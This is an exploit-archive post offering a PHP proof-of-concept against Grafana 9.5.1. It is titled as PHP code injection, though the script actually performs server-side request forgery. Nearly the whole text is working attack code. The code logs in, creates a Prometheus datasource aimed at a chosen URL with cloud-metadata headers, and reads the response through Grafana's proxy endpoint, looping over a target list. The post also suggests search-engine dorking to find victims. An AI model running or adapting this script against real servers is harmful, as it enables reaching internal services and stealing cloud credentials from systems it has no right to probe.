=============================================================================================================================================
| # Title     : Grafana 9.5.1 PHP Code Injection Vulnerability                                                                              |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://grafana.com/grafana/download/9.5.1                                                                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:
    
	It is mainly used as an SSRF (Server-Side Request Forgery) attack against Grafana, an open source data analytics application used to display charts and monitored data. Here are the main uses
 
[+] save code as poc.php .

[+] Set Targrt : line = 225 + 226 + 227

[+] USage : php poc.php 

[+] PayLoad :

<?php
// إعدادات الاتصال بـ cURL
function send_post_request($url, $data, $headers, $cookies) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($ch, CURLOPT_COOKIE, $cookies);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
    if ($data) {
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
    }
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);  // إيقاف التحقق من الشهادات
    $response = curl_exec($ch);
    $status_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
    curl_close($ch);
    return [
        'status_code' => $status_code,
        'body' => $response
    ];
}

// إنشاء مصدر Grafana
function create_source($sessionid, $ssrf_url, $ghost) {
    $rawBody = json_encode([
        "name" => "SSRF-TESTING",
        "type" => "prometheus",
        "access" => "proxy",
        "isDefault" => false
    ]);

    $headers = [
        "Origin: " . $ghost,
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/datasources/new",
        "Connection: close",
        "x-grafana-org-id: 1",
        "content-type: application/json",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate"
    ];

    $cookies = "grafana_session=" . $sessionid;
    $url = $ghost . "/api/datasources";
    $response = send_post_request($url, $rawBody, $headers, $cookies);

    if ($response['status_code'] == 200) {
        $data = json_decode($response['body'], true);
        if (isset($data['id'])) {
            echo "Source Created\n";
            return $data['id'];
        } else {
            echo "Error: " . $response['body'] . "\n";
        }
    } else {
        echo "Error:\n";
        echo "Status code: " . $response['status_code'] . "\n";
        echo $response['body'] . "\n";
    }
}

// تحديث مصدر Grafana
function refresh_source($ghost, $sessionid, $id) {
    $headers = [
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/datasources/edit/6/",
        "Connection: close",
        "x-grafana-org-id: 1",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate"
    ];
    $cookies = "grafana_session=" . $sessionid;
    $url = $ghost . "/api/datasources/" . $id;
    $response = send_post_request($url, null, $headers, $cookies);
    
    if ($response['status_code'] == 200) {
        echo "Refreshed Sources\n";
    } else {
        echo "Error:\n";
        echo "Status code: " . $response['status_code'] . "\n";
        echo $response['body'] . "\n";
    }
}

// إنشاء SSRF في Grafana
function create_ssrf($sessionid, $ssrf_url, $ghost, $id) {
    $rawBody = json_encode([
        "id" => $id,
        "orgId" => 1,
        "name" => "SSRF-TESTING",
        "type" => "prometheus",
        "access" => "proxy",
        "url" => $ssrf_url,
        "password" => "test",
        "user" => "test",
        "database" => "test",
        "basicAuth" => false,
        "withCredentials" => false,
        "isDefault" => false,
        "jsonData" => [
            "tlsSkipVerify" => true,
            "httpHeaderName1" => "Metadata-Flavor",
            "httpHeaderName2" => "Metadata",
            "httpMethod" => "GET"
        ],
        "secureJsonData" => [
            "httpHeaderValue1" => "Google",
            "httpHeaderValue2" => "true"
        ],
        "version" => 1,
        "readOnly" => false
    ]);

    $headers = [
        "Origin: " . $ghost,
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/datasources/edit/6/",
        "Connection: close",
        "x-grafana-org-id: 1",
        "content-type: application/json",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate"
    ];

    $cookies = "grafana_session=" . $sessionid;
    $url = $ghost . "/api/datasources/" . $id;
    $response = send_post_request($url, $rawBody, $headers, $cookies);

    if ($response['status_code'] == 200) {
        echo "SSRF Source Updated\n";
    } else {
        echo "Error:\n";
        echo "Status code: " . $response['status_code'] . "\n";
        echo $response['body'] . "\n";
    }
}

// فحص Grafana SSRF
function check_ssrf($sessionid, $id, $ghost, $ssrf_url) {
    $headers = [
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/datasources/edit/" . $id . "/",
        "Connection: close",
        "x-grafana-org-id: 1",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate",
        "x-grafana-nocache" => "true"
    ];
    $cookies = "grafana_session=" . $sessionid;
    $url = $ghost . "/api/datasources/proxy/" . $id . "/";
    $response = send_post_request($url, null, $headers, $cookies);
    
    if ($response['status_code'] != 502) {
        echo "Status code: " . $response['status_code'] . "\n";
        echo "Response body:\n" . $response['body'] . "\n";
        $gghost = parse_url($ghost, PHP_URL_HOST);
        $sub_addr = explode('.', $gghost)[0];
        file_put_contents($sub_addr . ".txt", "SSRF URL: " . $ssrf_url . "\nStatus code: " . $response['status_code'] . "\nResponse body: " . $response['body'] . "\n\n", FILE_APPEND);
    } else {
        echo "Error:\n";
        echo $response['body'] . "\n";
    }
}

// حذف مصدر Grafana
function delete_source($sessionid, $id, $ghost) {
    $headers = [
        "Origin: " . $ghost,
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/datasources/edit/3/",
        "Connection: close",
        "x-grafana-org-id: 1",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate"
    ];
    $cookies = "grafana_session=" . $sessionid;
    $url = $ghost . "/api/datasources/" . $id;
    $response = send_post_request($url, null, $headers, $cookies);
    
    if (strpos($response['body'], "Data source deleted") !== false) {
        echo "Deleted Old SSRF Source\n";
    } else {
        echo "Error:\n";
        echo $response['body'] . "\n";
        exit(0);
    }
}

// تسجيل الدخول إلى Grafana
function login($ghost, $username, $password) {
    $rawBody = json_encode(["user" => $username, "password" => $password, "email" => ""]);
    $headers = [
        "Origin: " . $ghost,
        "Accept: application/json, text/plain, */*",
        "User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:75.0) Gecko/20100101 Firefox/75.0",
        "Referer: " . $ghost . "/signup",
        "Connection: close",
        "content-type: application/json",
        "Accept-Language: en-US,en;q=0.5",
        "Accept-Encoding: gzip, deflate"
    ];
    $cookies = "redirect_to=%2F";
    $url = $ghost . "/login";
    $response = send_post_request($url, $rawBody, $headers, $cookies);
    $data = json_decode($response['body'], true);
    if (isset($data['grafana_session'])) {
        return $data['grafana_session'];
    } elseif (isset($data['grafana_sess'])) {
        return $data['grafana_sess'];
    } else {
        echo "Login Session Cookie not set\n";
        exit(0);
    }
}

// منطق التنفيذ الرئيسي
$username = 'username';  // أدخل اسم المستخدم هنا
$password = 'password';  // أدخل كلمة المرور هنا
$ghost = 'http://example.com';  // أدخل رابط Grafana هنا
$ssrf_url = 'http://ssrf-target.com';  // أدخل URL هدف SSRF هنا
$files = 'ssrf_urls.txt';  // الملف الذي يحتوي على URLs إذا كان موجودًا

if ($username) {
    $sessionid = login($ghost, $username, $password);
}

if ($ssrf_url) {
    $id = create_source($sessionid, $ssrf_url, $ghost);
    refresh_source($ghost, $sessionid, $id);
    create_ssrf($sessionid, $ssrf_url, $ghost, $id);
    check_ssrf($sessionid, $id, $ghost, $ssrf_url);
}

if ($files) {
    if (file_exists($files)) {
        $lines = file($files, FILE_IGNORE_NEW_LINES);
        foreach ($lines as $ssrf_url) {
            $id = create_source($sessionid, $ssrf_url, $ghost);
            refresh_source($ghost, $sessionid, $id);
            create_ssrf($sessionid, $ssrf_url, $ghost, $id);
            check_ssrf($sessionid, $id, $ghost, $ssrf_url);
        }
    }
}
?>


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================